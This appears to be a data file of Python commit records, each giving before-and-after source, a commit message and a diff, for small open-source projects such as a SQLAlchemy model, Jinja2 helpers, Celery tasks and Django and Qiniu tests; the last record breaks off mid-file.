thread_id = Column(Integer(), ForeignKey('thread.id'), nullable=False, index=True)
# thread is a backref property
report = relationship('Report', backref='post', cascade='all, delete-orphan')
file = relationship('File', backref='post', uselist=False, lazy='joined', cascade='all, delete-orphan')
date = Column(BigInteger(), nullable=False, index=True)
name = Column(String())
subject = Column(String())
text = Column(String(), index=True)
refno = Column(Integer(), nullable=False, index=True)
password = Column(String())
ip4 = Column(Integer(), nullable=False, index=True)
|
from sqlalchemy import Column, Integer, String, BigInteger, ForeignKey
from sqlalchemy.orm import relationship
from uchan.database import ModelBase
class Post(ModelBase):
__tablename__ = 'post'
id = Column(Integer(), primary_key=True)
thread_id = Column(Integer(), ForeignKey('thread.id'), nullable=False, index=True)
# thread is a backref property
report = relationship('Report', backref='post', cascade='all, delete-orphan')
file = relationship('File', backref='post', uselist=False, lazy='joined', cascade='all, delete-orphan')
date = Column(BigInteger(), nullable=False, index=True)
name = Column(String())
subject = Column(String())
text = Column(String(), index=True)
refno = Column(Integer(), nullable=False, index=True)
password = Column(String())
ip4 = Column(BigInteger(), nullable=False, index=True)
|
Use bigint for ip4, fits addresses bigger dan 2^31
|
Use bigint for ip4, fits addresses bigger dan 2^31
|
Python
|
mit
|
Floens/uchan,Floens/uchan,Floens/uchan,Floens/uchan,Floens/uchan
|
---
+++
@@ -22,4 +22,4 @@
text = Column(String(), index=True)
refno = Column(Integer(), nullable=False, index=True)
password = Column(String())
- ip4 = Column(Integer(), nullable=False, index=True)
+ ip4 = Column(BigInteger(), nullable=False, index=True)
|
0c91b7546dcf770c5c1f90bb41ad2de1998a62bb
|
lib/stango/shortcuts.py
|
lib/stango/shortcuts.py
|
import os
def render_template(template_name, **kwargs):
from jinja2 import Environment, FileSystemLoader
env = Environment(loader=FileSystemLoader('templates'))
tmpl = env.get_template(template_name)
return tmpl.render(**kwargs)
|
import os
_env = None
def render_template(template_name, **kwargs):
from jinja2 import Environment, FileSystemLoader
global _env
if _env is None:
_env = Environment(loader=FileSystemLoader('templates'))
tmpl = _env.get_template(template_name)
return tmpl.render(**kwargs)
|
Use global Jinja2 environment in render_template
|
Use global Jinja2 environment in render_template
Before this patch, a new environment was created in every call of
render_template().
|
Python
|
mit
|
akheron/stango
|
---
+++
@@ -1,9 +1,12 @@
import os
+_env = None
def render_template(template_name, **kwargs):
from jinja2 import Environment, FileSystemLoader
+ global _env
- env = Environment(loader=FileSystemLoader('templates'))
- tmpl = env.get_template(template_name)
+ if _env is None:
+ _env = Environment(loader=FileSystemLoader('templates'))
+ tmpl = _env.get_template(template_name)
return tmpl.render(**kwargs)
|
eb47f234b865fb3ffc0d91c44ba114a73423595e
|
analyser/tasks.py
|
analyser/tasks.py
|
import os
import time
import rethinkdb as r
import requests
from krunchr.vendors.celery import celery, db
@celery.task(bind=True)
def get_file(self, url, path):
name, ext = os.path.splitext(url)
name = str(int(time.time()))
path = "%s/%s%s" % (path, name, ext)
response = requests.get(url)
with open(path, 'w') as f:
f.write(response.content)
r.table('jobs').filter({
'task_id': self.request.id
}).update({'state': 'done'}).run(db)
|
import os
import time
from shutil import copy2
from subprocess import Popen, PIPE
import rethinkdb as r
import requests
from krunchr.vendors.celery import celery, db, config
@celery.task(bind=True)
def get_file(self, url, path):
name, ext = os.path.splitext(url)
name = str(int(time.time()))
path = "%s/%s%s" % (path, name, ext)
response = requests.get(url)
with open(path, 'w') as f:
f.write(response.content)
r.table('jobs').filter({
'task_id': self.request.id
}).update({'state': 'done'}).run(db)
return path
@celery.task(bind=True)
def push_data(self, path):
filename = os.path.basename(path)
tmp_dir = str(int(time.time()))
os.chdir(config.DISCO_FILES)
os.makedirs(tmp_dir)
copy2(filename, "%s/%s" % (tmp_dir, filename))
os.chdir(tmp_dir)
split_process = Popen(['split', '-n', config.DISCO_NODES, path],
stdout=PIPE)
print split_process.communicate()
|
Create a task for data pushing
|
Create a task for data pushing
|
Python
|
apache-2.0
|
vtemian/kruncher
|
---
+++
@@ -1,10 +1,12 @@
import os
import time
+from shutil import copy2
+from subprocess import Popen, PIPE
import rethinkdb as r
import requests
-from krunchr.vendors.celery import celery, db
+from krunchr.vendors.celery import celery, db, config
@celery.task(bind=True)
@@ -21,3 +23,20 @@
r.table('jobs').filter({
'task_id': self.request.id
}).update({'state': 'done'}).run(db)
+
+ return path
+
+
+@celery.task(bind=True)
+def push_data(self, path):
+ filename = os.path.basename(path)
+ tmp_dir = str(int(time.time()))
+
+ os.chdir(config.DISCO_FILES)
+ os.makedirs(tmp_dir)
+ copy2(filename, "%s/%s" % (tmp_dir, filename))
+ os.chdir(tmp_dir)
+
+ split_process = Popen(['split', '-n', config.DISCO_NODES, path],
+ stdout=PIPE)
+ print split_process.communicate()
|
13f8d069f63b9bb22a268a27daae1434587807fc
|
competencies/tests/test_fork_schools.py
|
competencies/tests/test_fork_schools.py
|
from django.test import TestCase
from competencies.models import *
import testing_utilities as tu
class TestForkSchools(TestCase):
def setUp(self):
# Create a school.
self.school_0 = tu.create_school(name="School 0")
def test_fork_school(self):
# Make a new school, and fork school_o's system.
pass
def test_fork_school_from_view(self):
# Do the same thing as test_fork_school, but through
# view interface.
pass
|
from django.test import TestCase
from competencies.models import *
import testing_utilities as tu
class TestForkSchools(TestCase):
def setUp(self):
num_schools = 3
num_subject_areas = 5
# Create some schools.
self.schools = []
for school_num in range(0, num_schools):
school_name = "School %d" % school_num
self.schools.append(tu.create_school(name=school_name))
# Create some subject areas.
for school in self.schools:
for sa_num in range(0, num_subject_areas):
subject_area = "Subject %d" % sa_num
tu.create_subject_area(subject_area, school)
#self.show_schools()
def show_schools(self):
for school in self.schools:
print("\nSchool: %s" % school.name)
for subject_area in SubjectArea.objects.filter(school=school):
print("Subject area: %s" % subject_area)
def test_fork_school(self):
# Make a new school, and fork school_0's system.
pass
def test_fork_school_from_view(self):
# Do the same thing as test_fork_school, but through
# view interface.
pass
|
Test builds a number of schools, each of which has a number of subject areas.
|
Test builds a number of schools, each of which has a number of subject areas.
|
Python
|
mit
|
openlearningtools/opencompetencies,openlearningtools/opencompetencies
|
---
+++
@@ -6,11 +6,34 @@
class TestForkSchools(TestCase):
def setUp(self):
- # Create a school.
- self.school_0 = tu.create_school(name="School 0")
+ num_schools = 3
+ num_subject_areas = 5
+
+ # Create some schools.
+ self.schools = []
+ for school_num in range(0, num_schools):
+ school_name = "School %d" % school_num
+ self.schools.append(tu.create_school(name=school_name))
+
+ # Create some subject areas.
+ for school in self.schools:
+ for sa_num in range(0, num_subject_areas):
+ subject_area = "Subject %d" % sa_num
+ tu.create_subject_area(subject_area, school)
+
+ #self.show_schools()
+
+
+ def show_schools(self):
+
+ for school in self.schools:
+ print("\nSchool: %s" % school.name)
+ for subject_area in SubjectArea.objects.filter(school=school):
+ print("Subject area: %s" % subject_area)
+
def test_fork_school(self):
- # Make a new school, and fork school_o's system.
+ # Make a new school, and fork school_0's system.
pass
def test_fork_school_from_view(self):
|
9f6b12b2579f228fd9d04151771a22474a2744a3
|
tabula/wrapper.py
|
tabula/wrapper.py
|
import subprocess, io, shlex, os
import pandas as pd
def read_pdf_table(input_path, options=""):
jar_path = os.path.abspath(os.path.dirname(__file__))
JAR_NAME = "tabula-0.9.1-jar-with-dependencies.jar"
args = ["java", "-jar"] + [jar_path + "/" + JAR_NAME] + shlex.split(options) + [input_path]
result = subprocess.run(args, stdout=subprocess.PIPE)
if len(result.stdout) == 0:
return
return pd.read_csv(io.BytesIO(result.stdout))
|
import subprocess, io, shlex, os
import pandas as pd
def read_pdf_table(input_path, options=""):
JAR_NAME = "tabula-0.9.1-jar-with-dependencies.jar"
jar_dir = os.path.abspath(os.path.dirname(__file__))
jar_path = os.path.join(jar_dir, JAR_NAME)
args = ["java", "-jar", jar_path] + shlex.split(options) + [input_path]
result = subprocess.run(args, stdout=subprocess.PIPE)
if len(result.stdout) == 0:
return
return pd.read_csv(io.BytesIO(result.stdout))
|
Use os.path.join for Jar path to make it OS independent
|
Use os.path.join for Jar path to make it OS independent
|
Python
|
mit
|
chezou/tabula-py
|
---
+++
@@ -2,9 +2,10 @@
import pandas as pd
def read_pdf_table(input_path, options=""):
- jar_path = os.path.abspath(os.path.dirname(__file__))
JAR_NAME = "tabula-0.9.1-jar-with-dependencies.jar"
- args = ["java", "-jar"] + [jar_path + "/" + JAR_NAME] + shlex.split(options) + [input_path]
+ jar_dir = os.path.abspath(os.path.dirname(__file__))
+ jar_path = os.path.join(jar_dir, JAR_NAME)
+ args = ["java", "-jar", jar_path] + shlex.split(options) + [input_path]
result = subprocess.run(args, stdout=subprocess.PIPE)
|
77e237ce2d95e28c9b4ac7b5716131b3da268aec
|
tests/test_qiniu.py
|
tests/test_qiniu.py
|
import os
from os.path import dirname, join
import uuid
import qiniu.conf
import qiniu.io
import qiniu.rs
import qiniu.rsf
QINIU_ACCESS_KEY = os.environ.get('QINIU_ACCESS_KEY')
QINIU_SECRET_KEY = os.environ.get('QINIU_SECRET_KEY')
QINIU_BUCKET_NAME = os.environ.get('QINIU_BUCKET_NAME')
QINIU_BUCKET_DOMAIN = os.environ.get('QINIU_BUCKET_DOMAIN')
qiniu.conf.ACCESS_KEY = QINIU_ACCESS_KEY
qiniu.conf.SECRET_KEY = QINIU_SECRET_KEY
QINIU_PUT_POLICY= qiniu.rs.PutPolicy(QINIU_BUCKET_NAME)
def test_put_file():
ASSET_FILE_NAME = 'bootstrap.min.css'
with open(join(dirname(__file__),'assets', ASSET_FILE_NAME), 'rb') as assset_file:
text = assset_file.read()
print "Test text: %s" % text
token = QINIU_PUT_POLICY.token()
ret, err = qiniu.io.put(token, join(str(uuid.uuid4()), ASSET_FILE_NAME), text)
if err:
raise IOError(
"Error message: %s" % err)
|
import os
from os.path import dirname, join
import uuid
import qiniu.conf
import qiniu.io
import qiniu.rs
import qiniu.rsf
QINIU_ACCESS_KEY = os.environ.get('QINIU_ACCESS_KEY')
QINIU_SECRET_KEY = os.environ.get('QINIU_SECRET_KEY')
QINIU_BUCKET_NAME = os.environ.get('QINIU_BUCKET_NAME')
QINIU_BUCKET_DOMAIN = os.environ.get('QINIU_BUCKET_DOMAIN')
qiniu.conf.ACCESS_KEY = QINIU_ACCESS_KEY
qiniu.conf.SECRET_KEY = QINIU_SECRET_KEY
QINIU_PUT_POLICY= qiniu.rs.PutPolicy(QINIU_BUCKET_NAME)
def test_put_file():
ASSET_FILE_NAME = 'jquery-1.11.1.min.js'
with open(join(dirname(__file__),'assets', ASSET_FILE_NAME), 'rb') as assset_file:
text = assset_file.read()
print "Test text: %s" % text
token = QINIU_PUT_POLICY.token()
ret, err = qiniu.io.put(token, join(str(uuid.uuid4()), ASSET_FILE_NAME), text)
if err:
raise IOError(
"Error message: %s" % err)
|
Test upload with a small file
|
Test upload with a small file
|
Python
|
mit
|
jeffrey4l/django-qiniu-storage,jackeyGao/django-qiniu-storage,Mark-Shine/django-qiniu-storage,glasslion/django-qiniu-storage
|
---
+++
@@ -19,7 +19,7 @@
QINIU_PUT_POLICY= qiniu.rs.PutPolicy(QINIU_BUCKET_NAME)
def test_put_file():
- ASSET_FILE_NAME = 'bootstrap.min.css'
+ ASSET_FILE_NAME = 'jquery-1.11.1.min.js'
with open(join(dirname(__file__),'assets', ASSET_FILE_NAME), 'rb') as assset_file:
text = assset_file.read()
|
18808b6594d7e2b1c81a2cf4351708e179fb29bb
|
tests/test_utils.py
|
tests/test_utils.py
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from badwolf.utils import sanitize_sensitive_data
def test_sanitize_basic_auth_urls():
text = 'abc http://user:pwd@example.com def'
sanitized = sanitize_sensitive_data(text)
assert 'user' not in sanitized
assert 'pwd' not in sanitized
assert 'http://***:***@example.com' in sanitized
text = '''abc
http://user:pwd@example.com
def
'''
sanitized = sanitize_sensitive_data(text)
assert 'user' not in sanitized
assert 'pwd' not in sanitized
assert 'http://***:***@example.com' in sanitized
text = '''abc
http://example.com
-e git+https://user:pwd@example.com/
def
'''
sanitized = sanitize_sensitive_data(text)
assert 'user' not in sanitized
assert 'pwd' not in sanitized
assert 'http://example.com' in sanitized
assert 'git+https://***:***@example.com' in sanitized
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from badwolf.utils import sanitize_sensitive_data
def test_sanitize_basic_auth_urls():
text = 'abc http://user:pwd@example.com def'
sanitized = sanitize_sensitive_data(text)
assert 'user' not in sanitized
assert 'pwd' not in sanitized
assert 'http://***:***@example.com' in sanitized
text = '''abc
http://user:pwd@example.com
def
'''
sanitized = sanitize_sensitive_data(text)
assert 'user' not in sanitized
assert 'pwd' not in sanitized
assert 'http://***:***@example.com' in sanitized
text = '''abc
http://example.com
-e git+https://user:pwd@example.com/
def
'''
sanitized = sanitize_sensitive_data(text)
assert 'user' not in sanitized
assert 'pwd' not in sanitized
assert 'http://example.com' in sanitized
assert 'git+https://***:***@example.com' in sanitized
lots_of_urls = ['-e git+https://user:pwd@example.com abcd'] * 1000
lots_of_urls.extend(['abc http://example.com def'] * 1000)
text = '\n'.join(lots_of_urls)
sanitized = sanitize_sensitive_data(text)
assert 'user' not in sanitized
assert 'pwd' not in sanitized
assert 'http://example.com' in sanitized
assert 'git+https://***:***@example.com' in sanitized
|
Update test case for sanitize_sensitive_data
|
Update test case for sanitize_sensitive_data
|
Python
|
mit
|
bosondata/badwolf,bosondata/badwolf,bosondata/badwolf
|
---
+++
@@ -32,3 +32,12 @@
assert 'pwd' not in sanitized
assert 'http://example.com' in sanitized
assert 'git+https://***:***@example.com' in sanitized
+
+ lots_of_urls = ['-e git+https://user:pwd@example.com abcd'] * 1000
+ lots_of_urls.extend(['abc http://example.com def'] * 1000)
+ text = '\n'.join(lots_of_urls)
+ sanitized = sanitize_sensitive_data(text)
+ assert 'user' not in sanitized
+ assert 'pwd' not in sanitized
+ assert 'http://example.com' in sanitized
+ assert 'git+https://***:***@example.com' in sanitized
|
db45239e050e6699a2c49fe4156b100c42481c9f
|
wsme/tests/test_spore.py
|
wsme/tests/test_spore.py
|
import unittest
try:
import simplejson as json
except ImportError:
import json
from wsme.tests.protocol import WSTestRoot
import wsme.tests.test_restjson
import wsme.spore
class TestSpore(unittest.TestCase):
def test_spore(self):
spore = wsme.spore.getdesc(WSTestRoot())
print(spore)
spore = json.loads(spore)
assert len(spore['methods']) == 40, str(len(spore['methods']))
m = spore['methods']['argtypes_setbytesarray']
assert m['path'] == '/argtypes/setbytesarray'
assert m['optional_params'] == ['value']
assert m['method'] == 'POST'
m = spore['methods']['argtypes_setdecimal']
assert m['path'] == '/argtypes/setdecimal'
assert m['required_params'] == ['value']
assert m['method'] == 'GET'
|
import unittest
try:
import simplejson as json
except ImportError:
import json
from wsme.tests.protocol import WSTestRoot
import wsme.tests.test_restjson
import wsme.spore
class TestSpore(unittest.TestCase):
def test_spore(self):
spore = wsme.spore.getdesc(WSTestRoot())
print(spore)
spore = json.loads(spore)
assert len(spore['methods']) == 40, str(len(spore['methods']))
m = spore['methods']['argtypes_setbytesarray']
assert m['path'] == '/argtypes/setbytesarray'
assert m['optional_params'] == ['value']
assert m['method'] == 'POST'
m = spore['methods']['argtypes_setdecimal']
assert m['path'] == '/argtypes/setdecimal'
assert m['required_params'] == ['value']
assert m['method'] == 'GET'
m = spore['methods']['crud_create']
assert m['path'] == '/crud'
assert m['method'] == 'PUT'
assert m['optional_params'] == ['data']
m = spore['methods']['crud_read']
assert m['path'] == '/crud'
assert m['method'] == 'GET'
assert m['required_params'] == ['ref']
m = spore['methods']['crud_update']
assert m['path'] == '/crud'
assert m['method'] == 'POST'
assert m['optional_params'] == ['data']
m = spore['methods']['crud_delete']
assert m['path'] == '/crud'
assert m['method'] == 'DELETE'
assert m['optional_params'] == ['ref']
|
Test SPORE crud function descriptions
|
Test SPORE crud function descriptions
|
Python
|
mit
|
stackforge/wsme
|
---
+++
@@ -29,3 +29,23 @@
assert m['path'] == '/argtypes/setdecimal'
assert m['required_params'] == ['value']
assert m['method'] == 'GET'
+
+ m = spore['methods']['crud_create']
+ assert m['path'] == '/crud'
+ assert m['method'] == 'PUT'
+ assert m['optional_params'] == ['data']
+
+ m = spore['methods']['crud_read']
+ assert m['path'] == '/crud'
+ assert m['method'] == 'GET'
+ assert m['required_params'] == ['ref']
+
+ m = spore['methods']['crud_update']
+ assert m['path'] == '/crud'
+ assert m['method'] == 'POST'
+ assert m['optional_params'] == ['data']
+
+ m = spore['methods']['crud_delete']
+ assert m['path'] == '/crud'
+ assert m['method'] == 'DELETE'
+ assert m['optional_params'] == ['ref']
|
55c16e409d2919d0a32f7fce24c01059576ce867
|
linked_accounts/backends.py
|
linked_accounts/backends.py
|
from django.contrib.auth.models import User
from linked_accounts.handlers import AuthHandler
from oauth_flow.handlers import OAuth20Token
class LinkedAccountsBackend(object):
supports_object_permissions = False
supports_anonymous_user = False
supports_inactive_user = False
def get_user(self, user_id):
return User.objects.get(id=user_id)
def authenticate(self, service=None, token=None, expires=None):
if isinstance(token, basestring):
token = OAuth20Token(token, expires)
handler = AuthHandler.get_handler(service)
return handler.get_profile(token)
|
from django.contrib.auth.models import User
from linked_accounts.handlers import AuthHandler
from oauth_flow.handlers import OAuth20Token
class LinkedAccountsBackend(object):
supports_object_permissions = False
supports_anonymous_user = False
supports_inactive_user = False
def get_user(self, user_id):
return User.objects.get(id=user_id)
def authenticate(self, service=None, token=None, expires=None):
if isinstance(token, basestring) and service in ['facebook', 'google']:
token = OAuth20Token(token, expires)
handler = AuthHandler.get_handler(service)
return handler.get_profile(token)
|
Use OAuth20Token only for facebook, google
|
Use OAuth20Token only for facebook, google
|
Python
|
mit
|
zen4ever/django-linked-accounts,zen4ever/django-linked-accounts
|
---
+++
@@ -15,7 +15,7 @@
return User.objects.get(id=user_id)
def authenticate(self, service=None, token=None, expires=None):
- if isinstance(token, basestring):
+ if isinstance(token, basestring) and service in ['facebook', 'google']:
token = OAuth20Token(token, expires)
handler = AuthHandler.get_handler(service)
return handler.get_profile(token)
|
10e26b52f94bb1a6345d2c1540a0a09a82b7831c
|
baseflask/refresh_varsnap.py
|
baseflask/refresh_varsnap.py
|
"""
This script refreshes production varsnap snaps
"""
import os
from syspath import git_root # NOQA
from app import serve
os.environ['ENV'] = 'production'
app = serve.app.test_client()
app.get('/')
app.get('/health')
app.get('/robots.txt')
app.get('/asdf')
|
"""
This script refreshes production varsnap snaps
"""
import os
from syspath import git_root # NOQA
from app import serve
os.environ['ENV'] = 'production'
app = serve.app.test_client()
app.get('/')
app.get('/health')
app.get('/humans.txt')
app.get('/robots.txt')
app.get('/.well-known/security.txt')
app.get('/asdf')
|
Update varsnap refresh with new endpoints
|
Update varsnap refresh with new endpoints
|
Python
|
mit
|
albertyw/base-flask,albertyw/base-flask,albertyw/base-flask,albertyw/base-flask
|
---
+++
@@ -13,5 +13,7 @@
app = serve.app.test_client()
app.get('/')
app.get('/health')
+app.get('/humans.txt')
app.get('/robots.txt')
+app.get('/.well-known/security.txt')
app.get('/asdf')
|
79fb90779e5d85978cdb7dbb36f51baa96190f77
|
bci/__init__.py
|
bci/__init__.py
|
from fakebci import FakeBCI
|
import os
import sys
import platform
import shutil
import inspect
#
#def machine():
# """Return type of machine."""
# if os.name == 'nt' and sys.version_info[:2] < (2,7):
# return os.environ.get("PROCESSOR_ARCHITEW6432",
# os.environ.get('PROCESSOR_ARCHITECTURE', ''))
# else:
# return platform.machine()
#
#def arch(machine=machine()):
# """Return bitness of operating system, or None if unknown."""
# machine2bits = {'AMD64': 64, 'x86_64': 64, 'i386': 32, 'x86': 32}
# return machine2bits.get(machine, None)
#
#print (os_bits())
from fakebci import *
def create_so():
base_dir = os.path.dirname(inspect.getabsfile(FakeBCI))
boosted_bci = os.path.join(base_dir, 'boosted_bci.so')
if not os.path.exists(boosted_bci):
if sys.platform == 'darwin':
if platform.architecture()[0] == '64bit':
shutil.copyfile(os.path.join(base_dir, 'boosted_bci_darwin_x86_64.so'), boosted_bci)
else:
raise NotImplementedError("32 bit OS X is currently untested")
try:
from boosted_bci import greet
except:
print "Platform specific bci files have not been created"
|
Make some changes to the bci package file.
|
Make some changes to the bci package file.
|
Python
|
bsd-3-clause
|
NeuralProsthesisLab/unlock,NeuralProsthesisLab/unlock,NeuralProsthesisLab/unlock,NeuralProsthesisLab/unlock,NeuralProsthesisLab/unlock,NeuralProsthesisLab/unlock,NeuralProsthesisLab/unlock
|
---
+++
@@ -1 +1,38 @@
-from fakebci import FakeBCI
+import os
+import sys
+import platform
+import shutil
+import inspect
+
+#
+#def machine():
+# """Return type of machine."""
+# if os.name == 'nt' and sys.version_info[:2] < (2,7):
+# return os.environ.get("PROCESSOR_ARCHITEW6432",
+# os.environ.get('PROCESSOR_ARCHITECTURE', ''))
+# else:
+# return platform.machine()
+#
+#def arch(machine=machine()):
+# """Return bitness of operating system, or None if unknown."""
+# machine2bits = {'AMD64': 64, 'x86_64': 64, 'i386': 32, 'x86': 32}
+# return machine2bits.get(machine, None)
+#
+#print (os_bits())
+
+from fakebci import *
+
+def create_so():
+ base_dir = os.path.dirname(inspect.getabsfile(FakeBCI))
+ boosted_bci = os.path.join(base_dir, 'boosted_bci.so')
+ if not os.path.exists(boosted_bci):
+ if sys.platform == 'darwin':
+ if platform.architecture()[0] == '64bit':
+ shutil.copyfile(os.path.join(base_dir, 'boosted_bci_darwin_x86_64.so'), boosted_bci)
+ else:
+ raise NotImplementedError("32 bit OS X is currently untested")
+
+try:
+ from boosted_bci import greet
+except:
+ print "Platform specific bci files have not been created"
|
caddef7500241135965e6d91ca94a38224bfd0cd
|
ui2/path_helpers.py
|
ui2/path_helpers.py
|
import ui
def get_path_image(path):
""" Get an image of a path """
bounds = path.bounds
with ui.ImageContext(bounds.max_x, bounds.max_y) as ctx:
path.fill()
return ctx.get_image()
def copy_path(path):
""" Make a copy of a ui.Path and return it. Preserves all data. """
new = ui.Path()
new.append_path(path)
# Copy over the attributes
new.line_cap_style = path.line_cap_style
new.line_join_style = path.line_join_style
new.line_width = path.line_width
return new
|
import ui
import objc_util
def get_path_image(path):
""" Get an image of a path """
bounds = path.bounds
with ui.ImageContext(bounds.max_x, bounds.max_y) as ctx:
path.fill()
return ctx.get_image()
def copy_path(path):
""" Make a copy of a ui.Path and return it. Preserves all data. """
new = ui.Path()
new.append_path(path)
# Copy over the attributes
new.line_cap_style = path.line_cap_style
new.line_join_style = path.line_join_style
new.line_width = path.line_width
return new
def scale_path(path, scale):
""" Stretch or scale a path. Pass either a scale or a tuple of scales """
if not hasattr(scale, "__iter__"):
scale = (scale, scale)
sx, sy = scale
newpath = copy_path(path)
# Construct an affine transformation matrix
transform = objc_util.CGAffineTransform(sx, 0, 0, sy, 0, 0)
# Apply it to the path
objcpath = objc_util.ObjCInstance(newpath)
objcpath.applyTransform_(transform)
return newpath
|
Add method for scaling path
|
Add method for scaling path
|
Python
|
mit
|
controversial/ui2
|
---
+++
@@ -1,4 +1,5 @@
import ui
+import objc_util
def get_path_image(path):
@@ -19,3 +20,18 @@
new.line_width = path.line_width
return new
+
+
+def scale_path(path, scale):
+ """ Stretch or scale a path. Pass either a scale or a tuple of scales """
+ if not hasattr(scale, "__iter__"):
+ scale = (scale, scale)
+ sx, sy = scale
+
+ newpath = copy_path(path)
+ # Construct an affine transformation matrix
+ transform = objc_util.CGAffineTransform(sx, 0, 0, sy, 0, 0)
+ # Apply it to the path
+ objcpath = objc_util.ObjCInstance(newpath)
+ objcpath.applyTransform_(transform)
+ return newpath
|
e3604b5f0cdae3889cfe7531f7a5b9d1c09f56bd
|
PrettyJson.py
|
PrettyJson.py
|
import sublime
import sublime_plugin
import json
s = sublime.load_settings("Pretty JSON.sublime-settings")
class PrettyjsonCommand(sublime_plugin.TextCommand):
""" Pretty Print JSON
"""
def run(self, edit):
for region in self.view.sel():
# If no selection, use the entire file as the selection
if region.empty() and s.get("use_entire_file_if_no_selection"):
selection = sublime.Region(0, self.view.size())
else:
selection = region
try:
obj = json.loads(self.view.substr(selection))
self.view.replace(edit, selection, json.dumps(obj, indent=s.get("indent_size", 4), ensure_ascii=False, sort_keys=s.get("sort_keys", True)))
except Exception, e:
sublime.status_message(str(e))
|
import sublime
import sublime_plugin
import json
s = sublime.load_settings("Pretty JSON.sublime-settings")
class PrettyjsonCommand(sublime_plugin.TextCommand):
""" Pretty Print JSON
"""
def run(self, edit):
for region in self.view.sel():
# If no selection, use the entire file as the selection
if region.empty() and s.get("use_entire_file_if_no_selection"):
selection = sublime.Region(0, self.view.size())
else:
selection = region
try:
obj = json.loads(self.view.substr(selection))
self.view.replace(edit, selection, json.dumps(obj, indent=s.get("indent_size", 4), ensure_ascii=False, sort_keys=s.get("sort_keys", True), separators=(',', ': ')))
except Exception, e:
sublime.status_message(str(e))
|
Configure json.dumps() to use an item separator of "," instead of the default ", " to prevent single whitespace at the end of lines.
|
Configure json.dumps() to use an item separator of "," instead of the default ", " to prevent single whitespace at the end of lines.
Without this option, all prettyfied JSON has one space at the end of each line, which is not so pretty:
{
"key": "value",_
"key": "value",_
"key": "value"
}
This could of course be configured, but with the current simplicity of the package it would probably be overkill.
|
Python
|
mit
|
dzhibas/SublimePrettyJson
|
---
+++
@@ -18,6 +18,6 @@
try:
obj = json.loads(self.view.substr(selection))
- self.view.replace(edit, selection, json.dumps(obj, indent=s.get("indent_size", 4), ensure_ascii=False, sort_keys=s.get("sort_keys", True)))
+ self.view.replace(edit, selection, json.dumps(obj, indent=s.get("indent_size", 4), ensure_ascii=False, sort_keys=s.get("sort_keys", True), separators=(',', ': ')))
except Exception, e:
sublime.status_message(str(e))
|
fb67b85938d15cbb503bc0a0b0fde3bfb3436137
|
src/server.py
|
src/server.py
|
import argparse
import logging
import timeit
import cv2
from util import Action
from game import GameEnvironment
def main(args):
if args.debug_frames:
cv2.namedWindow('debug-frames')
prev_score = 0
game = GameEnvironment(args.agent)
while True:
start = timeit.default_timer()
frame, reward, terminal, lives = game.step(Action.IDLE)
print('frame=%s, reward=%d, terminal=%d, lives=%d' % (str(frame.shape), reward, terminal, lives))
if args.debug_frames:
cv2.imshow('debug-frames', frame)
cv2.waitKey(1)
duration = timeit.default_timer() - start
print('perceive-action cycle took %fs\n' % duration)
if args.debug_frames:
cv2.destroyWindow()
def get_parser():
parser = argparse.ArgumentParser(description='Server for nn-robot.')
parser.add_argument('--debug-frames', action='store_true', help='display each frame')
parser.add_argument('agent', help='name of the agent')
return parser
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
main(get_parser().parse_args())
|
import argparse
import logging
import timeit
import cv2
from util import Action
from game import GameEnvironment
def main(args):
if args.debug_frames:
cv2.namedWindow('debug-frames')
prev_score = 0
game = GameEnvironment(args.agent, host=args.host, port=args.port)
while True:
start = timeit.default_timer()
frame, reward, terminal, lives = game.step(Action.IDLE)
print('frame=%s, reward=%d, terminal=%d, lives=%d' % (str(frame.shape), reward, terminal, lives))
if args.debug_frames:
cv2.imshow('debug-frames', frame)
cv2.waitKey(1)
duration = timeit.default_timer() - start
print('perceive-action cycle took %fs\n' % duration)
if args.debug_frames:
cv2.destroyWindow()
def get_parser():
parser = argparse.ArgumentParser(description='Server for nn-robot.')
parser.add_argument('--debug-frames', action='store_true', help='display each frame')
parser.add_argument('--host', help='host of the robot, e.g. 192.168.1.2', type=str, default=None)
parser.add_argument('--port', help='port of the robot, e.g. 9090', type=int, default=9090)
parser.add_argument('agent', help='name of the agent')
return parser
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
main(get_parser().parse_args())
|
Add --host and --port flags
|
Add --host and --port flags
|
Python
|
mit
|
matthiasplappert/pibot
|
---
+++
@@ -13,7 +13,7 @@
cv2.namedWindow('debug-frames')
prev_score = 0
- game = GameEnvironment(args.agent)
+ game = GameEnvironment(args.agent, host=args.host, port=args.port)
while True:
start = timeit.default_timer()
frame, reward, terminal, lives = game.step(Action.IDLE)
@@ -33,6 +33,8 @@
def get_parser():
parser = argparse.ArgumentParser(description='Server for nn-robot.')
parser.add_argument('--debug-frames', action='store_true', help='display each frame')
+ parser.add_argument('--host', help='host of the robot, e.g. 192.168.1.2', type=str, default=None)
+ parser.add_argument('--port', help='port of the robot, e.g. 9090', type=int, default=9090)
parser.add_argument('agent', help='name of the agent')
return parser
|
cdb7dfd529f4078ab5995e38a8ae2f3b61c3fe98
|
tests/__init__.py
|
tests/__init__.py
|
# tests.__init__
import os
import os.path
import shutil
import tempfile
import yvs.shared as yvs
from mock import patch
temp_dir = tempfile.gettempdir()
local_data_dir_patcher = patch(
'yvs.shared.LOCAL_DATA_DIR_PATH',
os.path.join(temp_dir, 'yvs-data'))
local_cache_dir_patcher = patch(
'yvs.shared.LOCAL_CACHE_DIR_PATH',
os.path.join(temp_dir, 'yvs-cache'))
def set_up():
local_data_dir_patcher.start()
try:
os.mkdir(yvs.LOCAL_DATA_DIR_PATH)
except OSError:
pass
local_cache_dir_patcher.start()
try:
os.mkdir(yvs.LOCAL_CACHE_DIR_PATH)
except OSError:
pass
def tear_down():
try:
shutil.rmtree(yvs.LOCAL_CACHE_DIR_PATH)
except OSError:
pass
local_cache_dir_patcher.stop()
try:
shutil.rmtree(yvs.LOCAL_DATA_DIR_PATH)
except OSError:
pass
local_data_dir_patcher.stop()
|
# tests.__init__
import os
import os.path
import shutil
import tempfile
from mock import patch
import yvs.shared as yvs
temp_dir = tempfile.gettempdir()
local_data_dir_patcher = patch(
'yvs.shared.LOCAL_DATA_DIR_PATH',
os.path.join(temp_dir, 'yvs-data'))
local_cache_dir_patcher = patch(
'yvs.shared.LOCAL_CACHE_DIR_PATH',
os.path.join(temp_dir, 'yvs-cache'))
def set_up():
local_data_dir_patcher.start()
try:
os.mkdir(yvs.LOCAL_DATA_DIR_PATH)
except OSError:
pass
